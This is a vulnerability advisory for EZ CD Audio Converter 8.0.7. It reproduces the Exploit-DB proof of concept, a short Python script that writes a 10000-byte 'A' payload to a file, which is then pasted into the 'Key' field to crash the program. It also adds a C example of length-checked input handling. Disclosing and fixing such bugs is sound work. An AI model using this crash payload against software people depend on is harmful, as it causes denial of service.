Vendor: EZ CD Audio Converter
By: Achilles
CVSS: 7.8 (HIGH)
Denial of Service (DoS) Local Buffer Overflow
CWE: 119
Product Name: EZ CD Audio Converter
Affected Version From: 8.0.7
Affected Version To: 8.0.7
Patch Exists: YES
Related CWE: N/A
CPE: a:poikosoft:ez_cd_audio_converter
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 7 x64
2018

EZ CD Audio Converter 8.0.7 – Denial of Service (PoC)

EZ CD Audio Converter 8.0.7 is vulnerable to a local buffer overflow that results in a Denial of Service (DoS). To trigger it, run a Python script that creates a file containing a 10000-byte payload, copy the content of the file to the clipboard, open the EZ CD Audio Converter application, and paste the content into the 'Key' field; the application then crashes.

Mitigation:

Upgrade to the latest version of EZ CD Audio Converter
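
On the developer side, this class of bug (CWE-119 reached through an oversized value pasted into a text field) is closed by rejecting the input on length before any copy into a fixed-size buffer. The C code below is an added example, not code from EZ CD Audio Converter or from the original advisory; the function name `store_key`, the limit `KEY_MAX` and the allowed key alphabet are assumptions.

```c
#include <ctype.h>
#include <stddef.h>
#include <string.h>

#define KEY_MAX 64  /* assumed maximum key length; not taken from the product */

enum key_status { KEY_OK = 0, KEY_EMPTY, KEY_TOO_LONG, KEY_BAD_CHAR };

/*
 * Copy untrusted text (for example a clipboard paste) into dst, which must
 * hold KEY_MAX + 1 bytes. Length and alphabet are checked before any byte
 * of the input is written, so an oversized paste never reaches memcpy.
 */
enum key_status store_key(char dst[KEY_MAX + 1], const char *src, size_t src_cap)
{
    dst[0] = '\0';
    if (src == NULL || src_cap == 0)
        return KEY_EMPTY;

    /* Bounded length scan: never read more than src_cap bytes of input. */
    const char *nul = memchr(src, '\0', src_cap);
    size_t len = nul ? (size_t)(nul - src) : src_cap;
    if (len == 0)
        return KEY_EMPTY;
    if (len > KEY_MAX)
        return KEY_TOO_LONG;

    /* Assumed key alphabet: ASCII letters, digits and '-'. */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)src[i];
        if (!isalnum(c) && c != '-')
            return KEY_BAD_CHAR;
    }

    memcpy(dst, src, len);
    dst[len] = '\0';
    return KEY_OK;
}

int main(void)
{
    char key[KEY_MAX + 1], paste[10000];  /* constructed sample input */
    memset(paste, 0x41, sizeof paste);    /* same size and byte as the PoC file */
    return store_key(key, paste, sizeof paste) == KEY_TOO_LONG ? 0 : 1;
}
```
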

Exploit-DB raw data:

# Exploit Title: EZ CD Audio Converter 8.0.7 - Denial of Service (PoC)
# Date: 2018-12-30
# Exploit Author: Achilles
# Vendor Homepage: https://www.poikosoft.com/
# Software Link : https://download.poikosoft.com/ez_cd_audio_converter_setup_x64.exe
# Tested Version: 8.0.7 (64-bit)
# Tested on: Windows 7 x64
# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
# Steps to Produce the Crash:
# 1.- Run python code : EZ_CD_Audio_Converter.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open EZ_CD_Audio_Converter 'Press Activate'
# 4.- Paste the content of EVIL.txt into the field: 'Key'
# 5.- And you will see a crash.

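#!/usr/bin/env python3

# 10000 bytes of "A" (0x41), the payload pasted into the 'Key' field
buffer = "\x41" * 10000

try:
    # Write the payload to Evil.txt in the current directory
    with open("Evil.txt", "w") as f:
        print("[+] Creating %s bytes evil payload.." % len(buffer))
        f.write(buffer)
    print("[+] File created!")
except OSError:
    print("File cannot be created")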